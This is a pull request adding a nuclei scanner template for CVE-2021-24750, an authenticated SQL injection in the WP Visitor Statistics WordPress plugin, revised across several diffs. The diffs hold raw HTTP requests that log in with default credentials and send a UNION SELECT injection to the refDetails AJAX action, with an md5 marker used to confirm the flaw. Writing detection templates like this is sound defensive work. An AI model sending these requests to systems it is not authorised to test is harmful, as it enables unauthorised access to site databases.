### PR TITLE
add CVE-2021-24750(WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI)

### DIFF
--- a/cves/2021/CVE-2021-24750.yaml
+++ b/cves/2021/CVE-2021-24750.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 8.8
     cve-id: CVE-2021-24750
     cwe-id: CWE-89
-  tags: cve,cve2021,sqli,wp,wordpress,wp-l=plugin
+  tags: cve,cve2021,sqli,wp,wordpress,wp-plugin
 
 requests:
   - raw:

--- a/cves/2021/CVE-2021-24750.yaml
+++ b/cves/2021/CVE-2021-24750.yaml
@@ -6,14 +6,14 @@ info:
   severity: high
   description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
     - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
-  tags: cve,cve2021,sqli
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2021-24750
     cwe-id: CWE-89
+  tags: cve,cve2021,sqli,wp,wordpress,wp-l=plugin
 
 requests:
   - raw:
@@ -34,7 +34,7 @@ requests:
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
       - |
-        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5(1),4--%20%22%7D HTTP/1.1
+        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5(24750),4--%20%22%7D HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
         Accept-Encoding: gzip, deflate
@@ -47,15 +47,13 @@ requests:
       password:
         - user
     attack: clusterbomb
-
     cookie-reuse: true
-
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "c4ca4238a0b923820dcc509a6f75849b"
+          - "7efeb6400e09756814e99049835fa47b"
 
       - type: status
         status:

--- a/cves/2021/CVE-2021-24750.yaml
+++ b/cves/2021/CVE-2021-24750.yaml
@@ -13,47 +13,30 @@ info:
     cvss-score: 8.8
     cve-id: CVE-2021-24750
     cwe-id: CWE-89
-  tags: cve,cve2021,sqli,wp,wordpress,wp-plugin
+  tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
 
 requests:
   - raw:
       - |
         POST /wp-login.php HTTP/1.1
-        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
-        Accept-Encoding: gzip, deflate
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
         Host: {{Hostname}}
-        Accept-Language: de,en-US;q=0.7,en;q=0.3
+        Origin: {{RootURL}}
         Content-Type: application/x-www-form-urlencoded
-        Origin: http://{{Hostname}}
-        Upgrade-Insecure-Requests: 1
         Cookie: wordpress_test_cookie=WP%20Cookie%20check
-        Content-Length: 47
-        Connection: close
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
       - |
-        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5(24750),4--%20%22%7D HTTP/1.1
+        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: close
 
-    payloads:
-      username:
-        - user
-      password:
-        - user
-    attack: clusterbomb
     cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "7efeb6400e09756814e99049835fa47b"
+          - "266f89556d2b38ff067b580fb305c522"
 
       - type: status
         status:

--- a/cves/2021/CVE-2021-24750.yaml
+++ b/cves/2021/CVE-2021-24750.yaml
@@ -1,0 +1,62 @@
+id: CVE-2021-24750
+
+info:
+  name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
+  author: cckuakilong
+  severity: high
+  description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
+    - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
+  tags: cve,cve2021,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2021-24750
+    cwe-id: CWE-89
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
+        Accept-Encoding: gzip, deflate
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Host: {{Hostname}}
+        Accept-Language: de,en-US;q=0.7,en;q=0.3
+        Content-Type: application/x-www-form-urlencoded
+        Origin: http://{{Hostname}}
+        Upgrade-Insecure-Requests: 1
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+        Content-Length: 47
+        Connection: close
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5(1),4--%20%22%7D HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: close
+
+    payloads:
+      username:
+        - user
+      password:
+        - user
+    attack: clusterbomb
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "c4ca4238a0b923820dcc509a6f75849b"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO
![image](https://user-images.githubusercontent.com/10824150/150666041-faf5bf4b-9fab-4b9c-aa25-b12981033a02.png)

detail in https://github.com/projectdiscovery/nuclei-templates/issues/3583
#### Additional Details (leave it blank if not applicable)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)